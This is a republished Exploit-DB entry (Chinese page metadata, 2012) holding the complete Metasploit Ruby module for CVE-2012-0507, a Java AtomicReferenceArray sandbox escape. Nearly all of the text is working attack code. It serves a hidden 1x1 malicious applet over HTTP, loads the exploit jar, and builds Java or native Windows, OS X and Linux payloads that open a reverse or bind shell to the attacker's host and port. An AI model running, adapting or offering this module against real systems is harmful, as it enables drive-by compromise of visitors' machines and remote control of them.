Java – AtomicReferenceArray Type Violation (Metasploit)

• Exploit Database
• 118 阅读

• 作者： Metasploit
  日期： 2012-03-30
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/18679/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176

  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos; require &apos;rex&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE   def initialize( info = {} ) super( update_info( info, &apos;Name&apos; => &apos;Java AtomicReferenceArray Type Violation Vulnerability&apos;, &apos;Description&apos;=> %q{ This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;sinn3r&apos;, # metasploit module &apos;juan vazquez&apos;, # metasploit module &apos;egypt&apos; # special assistance ], &apos;References&apos; => [ [&apos;CVE&apos;, &apos;2012-0507&apos;], [&apos;BID&apos;, &apos;52161&apos;], [&apos;URL&apos;, &apos;http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3&apos;], [&apos;URL&apos;, &apos;http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx&apos;], [&apos;URL&apos;, &apos;https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507&apos;] ], &apos;Platform&apos; => [ &apos;java&apos;, &apos;win&apos;, &apos;osx&apos;, &apos;linux&apos;, &apos;solaris&apos; ], &apos;Payload&apos;=> { &apos;Space&apos; => 20480, &apos;BadChars&apos; => &apos;&apos;, &apos;DisableNops&apos; => true }, &apos;Targets&apos;=> [ [ &apos;Generic (Java Payload)&apos;, { &apos;Platform&apos; => [&apos;java&apos;], &apos;Arch&apos; => ARCH_JAVA, } ], [ &apos;Windows x86 (Native Payload)&apos;, { &apos;Platform&apos; => &apos;win&apos;, &apos;Arch&apos; => ARCH_X86, } ], [ &apos;Mac OS X PPC (Native Payload)&apos;, { &apos;Platform&apos; => &apos;osx&apos;, &apos;Arch&apos; => ARCH_PPC, } ], [ &apos;Mac OS X x86 (Native Payload)&apos;, { &apos;Platform&apos; => &apos;osx&apos;, &apos;Arch&apos; => ARCH_X86, } ], [ &apos;Linux x86 (Native Payload)&apos;, { &apos;Platform&apos; => &apos;linux&apos;, &apos;Arch&apos; => ARCH_X86, } ], ], &apos;DefaultTarget&apos;=> 0, &apos;DisclosureDate&apos; => &apos;Feb 14 2012&apos; )) end     def exploit # load the static jar file path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" ) fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close   super end     def on_request_uri( cli, request ) data = "" host = "" port = "" peer = "#{cli.peerhost}:#{cli.peerport}"   if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect( cli, get_resource() + &apos;/&apos;, &apos;&apos;) return end   print_status("#{peer} - Sending #{self.name}")   payload = regenerate_payload( cli ) if not payload print_error("#{peer} - Failed to generate the payload." ) return end   if target.name == &apos;Generic (Java Payload)&apos; if datastore[&apos;LHOST&apos;] jar= payload.encoded host = datastore[&apos;LHOST&apos;] port = datastore[&apos;LPORT&apos;] vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" ) else port = datastore[&apos;LPORT&apos;] datastore[&apos;RHOST&apos;] = cli.peerhost vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." ) end if jar print_status( "Generated jar to drop (#{jar.length} bytes)." ) jar = Rex::Text.to_hex( jar, prefix="" ) else print_error("#{peer} - Failed to generate the executable." ) return end else   # NOTE: The EXE mixin automagically handles detection of arch/platform data = generate_payload_exe   if data print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." ) data = Rex::Text.to_hex( data, prefix="" ) else print_error("#{peer} - Failed to generate the executable." ) return end   end   send_response_html( cli, generate_html( data, jar, host, port ), { &apos;Content-Type&apos; => &apos;text/html&apos; } ) return end   print_status( "#{peer} - sending jar..." ) send_response( cli, generate_jar(), { &apos;Content-Type&apos; => "application/octet-stream" } )   handler( cli ) end   def generate_html( data, jar, host, port ) jar_name = rand_text_alpha(rand(6)+3) + ".jar"   html= "<html><head></head>" html += "<body>" html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">" html += "<param name=\"data\" value=\"#{data}\"/>" if data html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar html += "<param name=\"lhost\" value=\"#{host}\"/>" if host html += "<param name=\"lport\" value=\"#{port}\"/>" if port html += "</applet></body></html>" return html end   def generate_jar() return @jar_data end   end